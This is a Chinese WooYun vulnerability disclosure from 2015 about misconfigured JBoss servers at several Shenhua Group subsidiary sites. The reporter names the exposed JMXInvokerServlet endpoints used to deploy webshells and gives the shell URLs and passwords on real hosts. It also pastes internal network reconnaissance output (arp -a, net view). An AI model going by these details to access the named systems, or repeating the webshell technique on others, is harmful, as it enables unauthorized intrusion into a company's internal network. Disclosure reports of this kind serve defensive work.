当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161313

漏洞标题:神华集团旗下几个分站漏洞打包(getshell可内网)

相关厂商:神华集团

漏洞作者: 路人甲

提交时间:2015-12-14 21:23

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-14: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经确认,细节仅向厂商公开
2015-12-25: 细节向核心白帽子及相关领域专家公开
2016-01-04: 细节向普通白帽子公开
2016-01-14: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

配置不当导致getshell

详细说明:

QQ截图20151214154829.png


1#http://218.241.131.229/dcwork/

QQ截图20151214210111.png


通过http://218.241.131.229/invoker/JMXInvokerServlet直接部署shell

QQ截图20151214210250.png


shell地址:
http://218.241.131.229/is/index.jsp
密码:023

QQ截图20151214210401.png


可内网

QQ截图20151214210434.png

漏洞证明:

2#http://oa.ghhd.net/dcwork/jsp/login.jsp

QQ截图20151214210457.png


仍然是jboss问题
http://oa.ghhd.net/invokers/JMXInvokerServlet
shell地址:http://oa.ghhd.net/jbossws13/index.jsp
密码:gainoverqq

QQ截图20151214211041.png


[*] 基本信息 [ A:C:D:F: ]
D:\jboss-4.0.2\server\default\.\deploy\jbossws13.war\jbossws13\> arp -a
接口: 10.1.169.10 --- 0xa
Internet 地址 物理地址 类型
10.1.169.1 00-1b-53-6e-95-c3 动态
10.1.169.2 00-50-56-8f-20-ab 动态
10.1.169.3 00-50-56-8f-3f-92 动态
10.1.169.4 00-50-56-8f-70-23 动态
10.1.169.6 00-19-bb-cb-af-7c 动态
10.1.169.8 00-50-56-8f-6d-df 动态
10.1.169.9 00-50-56-8e-55-a2 动态
10.1.169.11 00-21-5e-55-c8-fc 动态
10.1.169.12 00-50-56-8f-33-b6 动态
10.1.169.13 00-21-5e-09-76-cc 动态
10.1.169.15 00-50-56-8f-18-bd 动态
10.1.169.16 00-1a-6b-3a-4b-1a 动态
10.1.169.17 00-50-56-8f-0d-82 动态
10.1.169.18 00-50-56-8f-1d-20 动态
10.1.169.19 00-1a-4b-ad-3a-bc 动态
10.1.169.21 e4-1f-13-2d-ce-c0 动态
10.1.169.22 00-23-ae-99-b1-e8 动态
10.1.169.23 00-50-56-8f-24-50 动态
10.1.169.26 00-50-56-8e-2e-b5 动态
10.1.169.27 00-50-56-8e-08-97 动态
10.1.169.28 00-21-5e-4d-ba-c9 动态
10.1.169.29 00-21-5e-56-93-42 动态
10.1.169.30 00-50-56-8e-64-9d 动态
10.1.169.31 00-1a-64-dc-50-08 动态
10.1.169.33 00-50-56-8f-2a-6e 动态
10.1.169.35 00-50-56-8f-13-c2 动态
10.1.169.36 00-50-56-8f-3f-23 动态
10.1.169.37 00-50-56-8f-61-0f 动态
10.1.169.39 00-50-56-8e-47-e4 动态
10.1.169.40 00-50-56-8f-7e-f0 动态
10.1.169.44 00-50-56-8e-12-0b 动态
10.1.169.45 00-21-5e-4d-bd-ed 动态
10.1.169.46 00-21-5e-55-e3-88 动态
10.1.169.47 00-50-56-8e-08-97 动态
10.1.169.49 c0-56-e3-1b-34-d7 动态
10.1.169.50 00-50-56-8e-11-14 动态
10.1.169.51 00-21-5e-4d-bd-ae 动态
10.1.169.52 5e-f3-fc-28-fb-ff 动态
10.1.169.54 00-1a-4b-f1-d2-22 动态
10.1.169.55 00-50-56-8f-02-a1 动态
10.1.169.56 00-50-56-8f-2a-58 动态
10.1.169.58 00-50-56-8e-3f-74 动态
10.1.169.59 00-50-56-8f-41-c1 动态
10.1.169.60 00-21-5e-55-ac-30 动态
10.1.169.61 00-21-5e-55-ac-c2 动态
10.1.169.63 ff-ff-ff-ff-ff-ff 静态
169.254.175.253 00-1b-53-6e-95-c3 动态
224.0.0.5 01-00-5e-00-00-05 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
224.0.0.253 01-00-5e-00-00-fd 静态
228.0.0.4 01-00-5e-00-00-04 静态
239.5.5.5 01-00-5e-05-05-05 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
239.255.255.253 01-00-5e-7f-ff-fd 静态
系统找不到指定的路径。
D:\jboss-4.0.2\bin\> net view
服务器名称 注解
-------------------------------------------------------------------------------
\\GHHD
\\GHHD-22AF420CDD
\\GHHD-574737E2B7
\\GHHD-F4587AAF60
\\GHHD-MENHU002
\\GHHD-MHYY001
\\GHHD-MHYY002
\\GHHD-OAS001
\\GHHD-RTX0001
\\GHHD-RTX002
\\GHHD-TESTMIS
\\GHHD-TESTMIS_A
\\GHHD-VC006
\\GHHD_BFS
\\GHHD_XJBZ001
\\HZAJH001
\\HZBFS02
\\HZBKP001
\\HZDAN002
\\HZIMC001
\\HZJSJ001
\\HZOAS001
\\HZSIS001
\\HZTXS001
\\HZWEBBFS
\\HZXZC001
\\ITMONITOR
\\MTVNLFIE8JFZPVI
\\RAY-PC
\\WIN-SM9645LMU3L
命令成功完成。


QQ截图20151214211209.png

修复方案:

正确配置jboss

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-15 10:44

厂商回复:

已通知子分公司进行整改

最新状态:

暂无


漏洞评价:

评价